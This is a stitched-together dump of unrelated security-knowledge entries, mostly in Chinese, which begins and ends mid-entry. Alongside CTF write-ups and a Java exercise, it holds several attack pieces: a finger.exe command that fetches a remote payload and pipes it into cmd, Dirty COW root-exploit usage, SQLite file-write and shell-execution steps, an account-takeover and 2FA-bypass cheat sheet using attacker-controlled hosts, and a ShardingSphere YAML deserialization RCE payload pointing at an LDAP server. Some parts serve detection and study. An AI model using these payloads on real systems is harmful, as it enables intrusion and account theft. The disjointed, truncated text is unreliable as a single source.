didn't even try to reverse this. We just wrote a brute-force code in C++ which was generating possible flags and checking this condition on them. This was we found the real flag quite fast (it was still not really unique): DCTF{906400b5011160b0a19f47ec47b35f8f
sec-knowleage
# T1105-win-入口工具转移-# Finger.exe(白名单) ## 来自ATT&CK的描述 攻击者可能会将工具或其他文件从外部系统转移到被攻击的环境中。可以通过命令和控制通道从外部攻击者控制的系统复制文件,用以将工具带入被攻击的网络中,或通过其他工具(如 FTP)的替代协议。 也可以使用 scp、rsync 和 sftp等本地工具在Mac和 Linux上复制文件。 ## 测试案例 Finger.exe显示有关正在运行Finger服务或守护程序的指定远程计算机(通常是运行UNIX的计算机)上的一个或多个用户的信息。 远程计算机指定用户信息显示的格式和输出。 不带参数使用,手指显示帮助。 **路径:** ``` - c:\windows\system32\finger.exe - c:\windows\syswow64\finger.exe ``` 从远程Finger服务器下载有效载荷(Payload)。 此示例连接到“example.host.com”,询问用户“user”; 结果可能包含由cmd进程执行的恶意shellcode。 ``` finger user@example.host.com | more +2 | cmd ``` 用例:下载恶意负载 所需权限:用户 操作系统:Windows 8.1、Windows 10、Windows 11、Windows Server 2008、Windows Server 2008R2、Windows Server 2012、Windows Server 2012R2、Windows Server 2016、Windows Server 2019、Windows Server 2022 ## 检测日志 windows安全日志 ## 测试复现 Windows 10 测试 ``` C:\Users\liyang>Finger.exe 显示与运行手指服务的指定系统上某个用户有关 的信息。输出因远程系统而异。 FINGER [-l] [user]@host [...] -l 以长列表格式显示信息。 user 指定需要其信息的用户。省略 user 参数 将显示与指定主机上所有用户有关的信息。 @host 指定需要其用户信息的远程系统上的服务器。 C:\Users\liyang>finger user@example.host.com | more +2 | cmd Microsoft Windows [版本 10.0.18363.418] (c) 2019 Microsoft Corporation。保留所有权利。 ``` ## 测试留痕 ```log 已创建新进程。 创建者主题: 安全 ID: DESKTOP-PT656L6\liyang 帐户名: liyang 帐户域: DESKTOP-PT656L6 登录 ID: 0x47126 目标主题: 安全 ID: NULL SID 帐户名: - 帐户域: - 登录 ID: 0x0 进程信息: 新进程 ID: 0x2c8 新进程名称: C:\Windows\System32\finger.exe 令牌提升类型: %%1938 强制性标签: Mandatory Label\Medium Mandatory Level 创建者进程 ID: 0xc78 创建者进程名称: C:\Windows\System32\cmd.exe 进程命令行: finger  user@example.host.com ``` ## 检测方法/思路 参考Sigma官方规则: ```yml title: Finger.exe Suspicious Invocation id: af491bca-e752-4b44-9c86-df5680533dbc description: Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays author: Florian Roth, omkar72, oscd.community date: 2021/02/24 references: - https://twitter.com/bigmacjpg/status/1349727699863011328?s=12 - https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/ - http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt tags: - attack.command_and_control - attack.t1105 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\finger.exe' #单纯的对进程名称进行检测 condition: selection falsepositives: - Admin activity (unclear what they do nowadays with finger.exe) level: high ``` ### 建议 从Sigma给出的规则来看,更多的是对进程和命令行参数进行监测,只要出现其中一个命令参数即告警。 ## 参考推荐 MITRE-ATT&CK-T1105 <https://attack.mitre.org/techniques/T1105> Finger.exe <https://lolbas-project.github.io/lolbas/Binaries/Finger/> Finger使用方法 <https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)> Sigma: win_susp_finger_usage <https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml>
sec-knowleage
version: '2' services: web: image: vulhub/joomla:4.2.7 depends_on: - mysql environment: - JOOMLA_DB_HOST=mysql - JOOMLA_DB_PORT=3306 - JOOMLA_DB_USER=root - JOOMLA_DB_PASSWORD=vulhub - JOOMLA_DB_NAME=joomla ports: - "8080:80" mysql: image: mysql:5.7 environment: - MYSQL_ROOT_PASSWORD=vulhub
sec-knowleage
--- title: CVE-2016-5195 --- <center><h1>CVE-2016-5195</h1><b>本文作者:一生热爱</b><br><br></center> --- ## 一、描述 CVE-2016-5195 即 dirtyCOW ,俗称「脏牛」漏洞,是 Linux Kernel 中的条件竞争漏洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的越权读写。 脏牛漏洞几乎涵盖了所有主流的 Linux 发行版,同时也是一个由 Linus 本人亲手修复的漏洞。 ## 二、漏洞危害 低权限用户利用该漏洞可以在众多 Linux 系统上实现本地提权 ## 三、影响范围 这个漏洞自从内核2.6.22(2007年发行)开始就受影响了,直到 2016 年 10 月 18 日才修复 Linux各发行版本对于该漏洞的相关信息 - Red Hat:<https://access.redhat.com/security/cve/cve-2016-5195> - Debian :<https://security-tracker.debian.org/tracker/CVE-2016-5195> - Ubuntu:<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html> ## 四、漏洞利用 代码链接:[https://github.com/gbonacini/CVE-2016-5195.git](https://github.com/gbonacini/CVE-2016-5195.git) 编译程序 ```bash ./dcow ``` 或者 ```bash ./dcow -s # 自动打开root shell,恢复 passwd 文件 ./dcow -s -n # 自动打开root shell,但不恢复 passwd 文件 ``` 在 Ubuntu 16.04(4.4.0-21)提权成功 <img width="800" src="/img/Snipaste_2022-07-07_20-33-05.png"><br> <img width="800" src="/img/Snipaste_2022-07-07_20-39-08.png"> <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = "2022年7月7日" } } </script>
sec-knowleage
# ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898) 运行环境: ``` docker compose build docker compose up -d ``` ## 原理 - http://xdxd.love/2016/01/18/ffmpeg-SSRF%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ - http://blog.neargle.com/SecNewsBak/drops/CVE-2016-1897.8%20-%20FFMpeg%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html - http://habrahabr.ru/company/mailru/blog/274855/ ## 测试过程 详见参考文章,不再赘述。 成功读取文件: ![](01.png)
sec-knowleage
**Authors**: < [nixawk](https://github.com/nixawk) > ---- #SQLITE HACKING# ---- ##CONNECT TO DATABASE## Let's start with typing a simple sqlite3 command at command prompt which will provide you SQLite command prompt where you will issue various SQLite commands. ``` ┌─[lab@core]─[~/share/pentestlab/Darknet] └──╼ sqlite3 temp.db SQLite version 3.8.10.2 2015-05-20 18:17:19 Enter ".help" for usage hints. sqlite> .help .backup ?DB? FILE Backup DB (default "main") to FILE .bail on|off Stop after hitting an error. Default OFF .binary on|off Turn binary output on or off. Default OFF .clone NEWDB Clone data into NEWDB from the existing database .databases List names and files of attached databases .dbinfo ?DB? Show status information about the database .dump ?TABLE? ... Dump the database in an SQL text format If TABLE specified, only dump tables matching LIKE pattern TABLE. .echo on|off Turn command echo on or off .eqp on|off Enable or disable automatic EXPLAIN QUERY PLAN .exit Exit this program .explain ?on|off? Turn output mode suitable for EXPLAIN on or off. With no args, it turns EXPLAIN on. .fullschema Show schema and the content of sqlite_stat tables .headers on|off Turn display of headers on or off .help Show this message .import FILE TABLE Import data from FILE into TABLE .indexes ?TABLE? Show names of all indexes If TABLE specified, only show indexes for tables matching LIKE pattern TABLE. .limit ?LIMIT? ?VAL? Display or change the value of an SQLITE_LIMIT .load FILE ?ENTRY? Load an extension library .log FILE|off Turn logging on or off. FILE can be stderr/stdout .mode MODE ?TABLE? Set output mode where MODE is one of: ascii Columns/rows delimited by 0x1F and 0x1E csv Comma-separated values column Left-aligned columns. (See .width) html HTML <table> code insert SQL insert statements for TABLE line One value per line list Values delimited by .separator strings tabs Tab-separated values tcl TCL list elements .nullvalue STRING Use STRING in place of NULL values .once FILENAME Output for the next SQL command only to FILENAME .open ?FILENAME? Close existing database and reopen FILENAME .output ?FILENAME? Send output to FILENAME or stdout .print STRING... Print literal STRING .prompt MAIN CONTINUE Replace the standard prompts .quit Exit this program .read FILENAME Execute SQL in FILENAME .restore ?DB? FILE Restore content of DB (default "main") from FILE .save FILE Write in-memory database into FILE .scanstats on|off Turn sqlite3_stmt_scanstatus() metrics on or off .schema ?TABLE? Show the CREATE statements If TABLE specified, only show tables matching LIKE pattern TABLE. .separator COL ?ROW? Change the column separator and optionally the row separator for both the output mode and .import .shell CMD ARGS... Run CMD ARGS... in a system shell .show Show the current values for various settings .stats on|off Turn stats on or off .system CMD ARGS... Run CMD ARGS... in a system shell .tables ?TABLE? List names of tables If TABLE specified, only list tables matching LIKE pattern TABLE. .timeout MS Try opening locked tables for MS milliseconds .timer on|off Turn SQL timer on or off .trace FILE|off Output each SQL statement as it is run .vfsname ?AUX? Print the name of the VFS stack .width NUM1 NUM2 ... Set column widths for "column" mode Negative values right-justify ``` ---- ##GENERATE## Common sqlite features (comments, concate, substr, hex, quote, .... ) ``` sqlite> select 1; -- comments 1 sqlite> select 'hello ' || 'world'; hello world sqlite> select substr('hello world', 1, 3); hel sqlite> select hex('a'); 61 sqlite> select quote(hex('a')); '61' sqlite> PRAGMA database_list; 0|main|/tmp/evil.php 2|pwn|/tmp/evil.php sqlite> PRAGMA temp_store_directory = '/tmp'; sqlite> ``` ---- ##READ FILE## ``` sqlite> sqlite> CREATE TABLE pwn.data (data TEXT); sqlite> .tables data pwn.data sqlite> .import /etc/passwd data sqlite> select * from data; root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/usr/bin/nologin ...... ...... sqlite> .tables data pwn.data pwn.shell shell sqlite> DROP TABLE pwn.shell; ``` ---- ##WRITE FILE## ``` sqlite> ATTACH DATABASE '/tmp/evil.php' as pwn; sqlite> CREATE TABLE pwn.shell (code TEXT); sqlite> INSERT INTO pwn.shell (code) VALUES ('<?php phpinfo();?>'); sqlite> .quit ┌─[✗]─[lab@core]─[~/share/pentestlab/Darknet] └──╼ file /tmp/evil.php /tmp/evil.php: SQLite 3.x database ┌─[lab@core]─[~/share/pentestlab/Darknet] └──╼ strings /tmp/evil.php SQLite format 3 Itableshellshell CREATE TABLE shell (code TEXT) 1<?php phpinfo();?> ``` ---- ##COMMAND EXECUTION## ``` sqlite> .shell id uid=1000(lab) gid=1000(lab) groups=1000(lab) sqlite> .system id uid=1000(lab) gid=1000(lab) groups=1000(lab) ``` ---- #REFERENCES# http://www.tutorialspoint.com/sqlite/ http://atta.cked.me/home/sqlite3injectioncheatsheet
sec-knowleage
# John-Bull (crypto, 141p, 29 solved) In the challenge we get [code and encryption results](John_Bull.txt). The encryption code is quite simple: ```python def make_key(k): while True: r = getRandomInteger(k) << 2 p, q = r**2+r+1, r**2+3*r+1 if gmpy.is_prime(p) * gmpy.is_prime(q): break pubkey = r**6 + 5*r**5 + 10*r**4 + 13*r**3 + 10*r**2 + 5*r + 1 return pubkey def encrypt(m, pubkey): return pow(bytes_to_long(m), pubkey, pubkey) ``` The encryption looks like RSA with `e` set to `n`, and `n` itself is `(p**2)*q`. The first step is to recover `r` and thus factor `n`. We can see that `n` is a polynomial, and a nice property here is that for large `r` the higher order terms will be significantly bigger than lower order terms. Imagine `r=1000000`, in such case `r**6-r**5 ~= 0.999999*r**6` In our case we expect `r` to be much bigger than that, around 510 bits, which makes this property even stronger. This means that value of the polynomial `r**6 + 5*r**5 + 10*r**4 + 13*r**3 + 10*r**2 + 5*r + 1` will be realtively close to `r**6`. And if we calculate 6-th root the value should be pretty much identical, because all lower order terms will simply be swallowed as small fractions. We can confirm this by: ```python r = int(gmpy2.iroot(n, 6)[0]) p, q = r ** 2 + r + 1, r ** 2 + 3 * r + 1 print(gmpy2.is_prime(p)) print(gmpy2.is_prime(q)) assert n == p ** 2 * q ``` Now that we have `p` and `q` we can proceed with decrypting the flag. The issue now is that this encryption does not match RSA conditions -> `gcd(e,phi(n))!=1`. This is quite obvious since: `phi(n) = phi((p**2)*q) = phi(p**2) * phi(q) = p*(p-1) * (q-1)` And in our case `e = n = (p**2)*q` So `phi(n)` and `e` share a factor `p`. One approach we could try would be to divide `e` by `p` and calculate `d` for such `e`, but as a result we would just get `flag**p mod n` which doesn't help us much because we can't easily calculate k-th modular root. But we took a different path and guessed that `flag` might not be padded and thus it would be reasonably short. Specifically shorter not only than `n`, which is expected, but also shorted than `p*q`. We could calculate `ciphertext % (p*q)` transforming this problem back to classic RSA. We were lucky and this approach worked just fine: ```python enc = enc % (p * q) e = p * p * q fi = (p - 1) * (q - 1) d = modinv(e, fi) flag_p = gmpy2.powmod(enc, d, (p * q)) print(long_to_bytes(flag_p)) ``` Which gave us `ASIS{_Wo0W_Y0u_4r3_Mas73R_In____Schmidt-Samoa___}` Whole solver [here](john.py) As it turns out this is an existing cryptosystem, and could have been solved by: ```python d = modinv(n, lcm(p - 1, q - 1)) flag_p = gmpy2.powmod(enc, d, (p * q)) print(long_to_bytes(flag_p)) ```
sec-knowleage
# Account Takeover ## Summary * [Password Reset Feature](#password-reset-feature) * [Password Reset Token Leak Via Referrer](#password-reset-token-leak-via-referrer) * [Account Takeover Through Password Reset Poisoning](#account-takeover-through-password-reset-poisoning) * [Password Reset Via Email Parameter](#password-reset-via-email-parameter) * [IDOR on API Parameters](#idor-on-api-parameters) * [Weak Password Reset Token](#weak-password-reset-token) * [Leaking Password Reset Token](#leaking-password-reset-token) * [Password Reset Via Username Collision](#password-reset-via-username-collision) * [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue) * [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting) * [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling) * [Account Takeover via CSRF](#account-takeover-via-csrf) * [2FA Bypasses](#2fa-bypasses) * [Response Manipulation](#reponse-manipulation) * [Status Code Manipulation](#status-code-manipulation) * [2FA Code Leakage in Response](#2fa-code-leakage-in-response) * [JS File Analysis](#js-file-analysis) * [2FA Code Reusability](#2fa-code-reusability) * [Lack of Brute-Force Protection](#lack-of-brute-force-protection) * [Missing 2FA Code Integrity Validation](#missing-2fa-code-integrity-validation) * [CSRF on 2FA Disabling](#csrf-on-2fa-disabling) * [Password Reset Disable 2FA](#password-reset-disable-2fa) * [Backup Code Abuse](#backup-code-abuse) * [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page) * [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions) * [Bypass 2FA by Force Browsing](#bypass-2fa-by-force-browsing) * [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000) * [Bypass 2FA with array](#bypass-2fa-with-array) * [References](#references) ## Password Reset Feature ### Password Reset Token Leak Via Referrer 1. Request password reset to your email address 2. Click on the password reset link 3. Don't change password 4. Click any 3rd party websites(eg: Facebook, twitter) 5. Intercept the request in Burp Suite proxy 6. Check if the referer header is leaking password reset token. ### Account Takeover Through Password Reset Poisoning 1. Intercept the password reset request in Burp Suite 2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com` 3. Forward the request with the modified header ```http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com ``` 4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN` ### Password Reset Via Email Parameter ```powershell # parameter pollution email=victim@mail.com&email=hacker@mail.com # array of emails {"email":["victim@mail.com","hacker@mail.com"]} # carbon copy email=victim@mail.com%0A%0Dcc:hacker@mail.com email=victim@mail.com%0A%0Dbcc:hacker@mail.com # separator email=victim@mail.com,hacker@mail.com email=victim@mail.com%20hacker@mail.com email=victim@mail.com|hacker@mail.com ``` ### IDOR on API Parameters 1. Attacker have to login with their account and go to the **Change password** feature. 2. Start the Burp Suite and Intercept the request 3. Send it to the repeater tab and edit the parameters : User ID/email ```powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"}) ``` ### Weak Password Reset Token The password reset token should be randomly generated and unique every time. Try to determine if the token expire or if it's always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm. * Timestamp * UserID * Email of User * Firstname and Lastname * Date of Birth * Cryptography * Number only * Small token sequence (<6 characters between [A-Z,a-z,0-9]) * Token reuse * Token expiration date ### Leaking Password Reset Token 1. Trigger a password reset request using the API/UI for a specific email e.g: test@mail.com 2. Inspect the server response and check for `resetToken` 3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]` ### Password Reset Via Username Collision 1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g: `"admin "` 2. Request a password reset with your malicious username. 3. Use the token sent to your email and reset the victim password. 4. Connect to the victim account with the new password. The platform CTFd was vulnerable to this attack. See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) ### Account takeover due to unicode normalization issue When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur. - Victim account: `demo@gmail.com` - Attacker account: `demⓞ@gmail.com` [Unisub - is a tool that can suggest potential unicode characters that may be converted to a given character](https://github.com/tomnomnom/hacks/tree/master/unisub). [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform. ## Account Takeover Via Cross Site Scripting 1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com` 2. Leak the current **sessions cookie** 3. Authenticate as the user using the cookie ## Account Takeover Via HTTP Request Smuggling Refer to **HTTP Request Smuggling** vulnerability page. 1. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE) ```powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h ``` 2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data: ```powershell GET http://something.burpcollaborator.net HTTP/1.1 X: ``` 3. Final request could look like the following ```powershell GET / HTTP/1.1 Transfer-Encoding: chunked Host: something.com User-Agent: Smuggler/v1.0 Content-Length: 83 0 GET http://something.burpcollaborator.net HTTP/1.1 X: X ``` Hackerone reports exploiting this bug * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666 ## Account Takeover via CSRF 1. Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change" 2. Send the payload ## Account Takeover via JWT JSON Web Token might be used to authenticate an user. * Edit the JWT with another User ID / Email * Check for weak JWT signature ## 2FA Bypasses ### Response Manipulation In response if `"success":false` Change it to `"success":true` ### Status Code Manipulation If Status Code is **4xx** Try to change it to **200 OK** and see if it bypass restrictions ### 2FA Code Leakage in Response Check the response of the 2FA Code Triggering Request to see if the code is leaked. ### JS File Analysis Rare but some JS Files may contain info about the 2FA Code, worth giving a shot ### 2FA Code Reusability Same code can be reused ### Lack of Brute-Force Protection Possible to brute-force any length 2FA Code ### Missing 2FA Code Integrity Validation Code for any user acc can be used to bypass the 2FA ### CSRF on 2FA Disabling No CSRF Protection on disabling 2FA, also there is no auth confirmation ### Password Reset Disable 2FA 2FA gets disabled on password change/email change ### Backup Code Abuse Bypassing 2FA by abusing the Backup code feature Use the above mentioned techniques to bypass Backup Code to remove/reset 2FA restrictions ### Clickjacking on 2FA Disabling Page Iframing the 2FA Disabling page and social engineering victim to disable the 2FA ### Enabling 2FA doesn't expire Previously active Sessions If the session is already hijacked and there is a session timeout vuln ### Bypass 2FA by Force Browsing If the application redirects to `/my-account` url upon login while 2Fa is disabled, try replacing `/2fa/verify` with `/my-account` while 2FA is enabled to bypass verification. ### Bypass 2FA with null or 000000 Enter the code **000000** or **null** to bypass 2FA protection. ### Bypass 2FA with array ```json { "otp":[ "1234", "1111", "1337", // GOOD OTP "2222", "3333", "4444", "5555" ] } ``` ## TODO * Broken cryptography * Session hijacking * OAuth misconfiguration ## References - [10 Password Reset Flaws - Anugrah SR](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) - [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=gzM4wWA7RFo&feature=youtu.be) - [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28) - [Hacking Grindr Accounts with Copy and Paste - Troy HUNT & Wassime BOUIMADAGHENE - 03 OCTOBER 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/) - [CTFd Account Takeover](https://nvd.nist.gov/vuln/detail/CVE-2020-7245) - [2FA simple bypass](https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass)
sec-knowleage
# 5-Base64换表 --- 目标 T5.exe 使用 IDA 打开,找 main 函数,并做基本的分析,重命名函数 与T4基本一致 但仔细观察,最后的关键字符串为 ZYXABCDEFGHIJKLMNOPQRSTUVWzyxabcdefghijklmnopqrstuvw0123456789+/ 这是采用了 base64换表,同样利用 cyberchef 快速得到格式化的 16 进制值 按位与 i 异或即可 --- **Source & Reference** - [萌新学逆向——T5 突变的Base64算法](https://mp.weixin.qq.com/s/1ouGsCJTclTDmpXr7QoPXg)
sec-knowleage
# 32.3 按之字形顺序打印二叉树 [NowCoder](https://www.nowcoder.com/practice/91b69814117f4e8097390d107d2efbe0?tpId=13&tqId=11212&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 请实现一个函数按照之字形打印二叉树,即第一行按照从左到右的顺序打印,第二层按照从右至左的顺序打印,第三行按照从左到右的顺序打印,其他行以此类推。 ## 解题思路 ```java public ArrayList<ArrayList<Integer>> Print(TreeNode pRoot) { ArrayList<ArrayList<Integer>> ret = new ArrayList<>(); Queue<TreeNode> queue = new LinkedList<>(); queue.add(pRoot); boolean reverse = false; while (!queue.isEmpty()) { ArrayList<Integer> list = new ArrayList<>(); int cnt = queue.size(); while (cnt-- > 0) { TreeNode node = queue.poll(); if (node == null) continue; list.add(node.val); queue.add(node.left); queue.add(node.right); } if (reverse) Collections.reverse(list); reverse = !reverse; if (list.size() != 0) ret.add(list); } return ret; } ```
sec-knowleage
# T1190-CVE-2020-1947-Apache ShardingSphere远程代码执行漏洞 ## 来自ATT&CK的描述 使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。 如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。 对于网站和数据库,OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞。 ## 测试案例 Apache ShardingSphere是京东开源的分布式数据库中间件项目,于2018年11月进入Apache基金会孵化器,可提供数据分片(分库分表)、分布式事务、数据库治理三大功能。。 3月10日,Apache ShardingSphere官方库发布了新版本4.0.1,修复了远程代码执行漏洞(CVE-2020-1947)。攻击者在登录管理后台的前提下,通过提交恶意YAML代码,可实现远程代码执行。请相关用户尽快升级至最新版本,修复此漏洞。 影响范围:Apache ShardingSphere < 4.0.1 ## 检测日志 HTTP ## 测试复现 登录后台后,发送如下poc ```yml POST /api/schema HTTP/1.1 Host: localhost:8089 Accept: application/json, text/plain, */* Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Access-Token: 替换为自己的Poc Content-Length: 579 {"name":"CVE-2020-1947","ruleConfiguration":" encryptors:\n encryptor_aes:\n type: aes\n props:\n aes.key.value: 123456abc\n encryptor_md5:\n type: md5\n tables:\n t_encrypt:\n columns:\n user_id:\n plainColumn: user_plain\n cipherColumn: user_cipher\n encryptor: encryptor_aes\n order_id:\n cipherColumn: order_cipher\n encryptor: encryptor_md5","dataSourceConfiguration":"!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: ldap://127.0.0.1:1389/CommandObject\n autoCommit: true"} ``` ## 测试留痕 ```yml POST /api/schema HTTP/1.1 Host: 10.16.45.164:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Length: 577 Accept: application/json, text/plain, */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Access-Token: eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiIsImJhc2U2NCI6eyJlbmNvZGVUYWJsZSI6WzY1LDY2LDY3LDY4LDY5LDcwLDcxLDcyLDczLDc0LDc1LDc2LDc3LDc4LDc5LDgwLDgxLDgyLDgzLDg0LDg1LDg2LDg3LDg4LDg5LDkwLDk3LDk4LDk5LDEwMCwxMDEsMTAyLDEwMywxMDQsMTA1LDEwNiwxMDcsMTA4LDEwOSwxMTAsMTExLDExMiwxMTMsMTE0LDExNSwxMTYsMTE3LDExOCwxMTksMTIwLDEyMSwxMjIsNDgsNDksNTAsNTEsNTIsNTMsNTQsNTUsNTYsNTcsNDMsNDddLCJkZWNvZGVUYWJsZSI6Wy0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLDYyLC0xLDYyLC0xLDYzLDUyLDUzLDU0LDU1LDU2LDU3LDU4LDU5LDYwLDYxLC0xLC0xLC0xLC0xLC0xLC0xLC0xLDAsMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsLTEsLTEsLTEsLTEsNjMsLTEsMjYsMjcsMjgsMjksMzAsMzEsMzIsMzMsMzQsMzUsMzYsMzcsMzgsMzksNDAsNDEsNDIsNDMsNDQsNDUsNDYsNDcsNDgsNDksNTAsNTFdLCJkZWNvZGVTaXplIjozLCJlbmNvZGVTaXplIjo0LCJQQUQiOjYxLCJwYWQiOjYxLCJ1bmVuY29kZWRCbG9ja1NpemUiOjMsImVuY29kZWRCbG9ja1NpemUiOjQsImxpbmVMZW5ndGgiOjAsImNodW5rU2VwYXJhdG9yTGVuZ3RoIjoyfSwiZ3NvbiI6eyJjYWxscyI6eyJ0aHJlYWRMb2NhbEhhc2hDb2RlIjoxMzk4MDMyNzAxfSwidHlwZVRva2VuQ2FjaGUiOnsiamF2YS5sYW5nLkRvdWJsZSI6e30sImphdmEudXRpbC5NYXBcdTAwM2Njb20uZ29vZ2xlLmdzb24ucmVmbGVjdC5UeXBlVG9rZW5cdTAwM2M/XHUwMDNlLCBjb20uZ29vZ2xlLmdzb24uVHlwZUFkYXB0ZXJcdTAwM2M/XHUwMDNlXHUwMDNlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLnJlZmxlY3QuUmVmbGVjdGlvbkFjY2Vzc29yIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuT2JqZWN0VHlwZUFkYXB0ZXIkMSI6e30sImNvbS5nb29nbGUuZ3Nvbi5Mb25nU2VyaWFsaXphdGlvblBvbGljeSI6e30sImNvbS5nb29nbGUuZ3Nvbi5UeXBlQWRhcHRlclx1MDAzYz9cdTAwM2UiOnt9LCJqYXZhLmxhbmcuQ2xhc3NcdTAwM2M/XHUwMDNlIjp7fSwiamF2YS5sYW5nLlN0cmluZyI6e30sImphdmEubGFuZy5Cb29sZWFuIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuVHlwZUFkYXB0ZXJzJDMwIjp7fSwiY29tLmdvb2dsZS5nc29uLkZpZWxkTmFtaW5nUG9saWN5JDEiOnt9LCJvcmcuYXBhY2hlLmNvbW1vbnMuY29kZWMuYmluYXJ5LkJhc2U2NCI6e30sImNvbS5nb29nbGUuZ3Nvbi5Mb25nU2VyaWFsaXphdGlvblBvbGljeSQxIjp7fSwiY29tLmdvb2dsZS5nc29uLnJlZmxlY3QuVHlwZVRva2VuXHUwMDNjP1x1MDAzZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLlRpbWVUeXBlQWRhcHRlciQxIjp7fSwiamF2YS5sYW5nLnJlZmxlY3QuVHlwZSI6e30sImphdmEudXRpbC5MaXN0XHUwMDNjY29tLmdvb2dsZS5nc29uLlR5cGVBZGFwdGVyRmFjdG9yeVx1MDAzZSI6e30sImphdmEubGFuZy5CeXRlIjp7fSwiamF2YS5sYW5nLkludGVnZXIiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5TcWxEYXRlVHlwZUFkYXB0ZXIkMSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLkpzb25BZGFwdGVyQW5ub3RhdGlvblR5cGVBZGFwdGVyRmFjdG9yeSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLk1hcFR5cGVBZGFwdGVyRmFjdG9yeSI6e30sImJ5dGUiOnt9LCJieXRlW10iOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzQiOnt9LCJjb20uZ29vZ2xlLmdzb24uSW5zdGFuY2VDcmVhdG9yXHUwMDNjP1x1MDAzZSI6e30sIm9yZy5hcGFjaGUuc2hhcmRpbmdzcGhlcmUudWkuc2VjdXJpdHkuVXNlckF1dGhlbnRpY2F0aW9uU2VydmljZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLlJlZmxlY3RpdmVUeXBlQWRhcHRlckZhY3RvcnkiOnt9L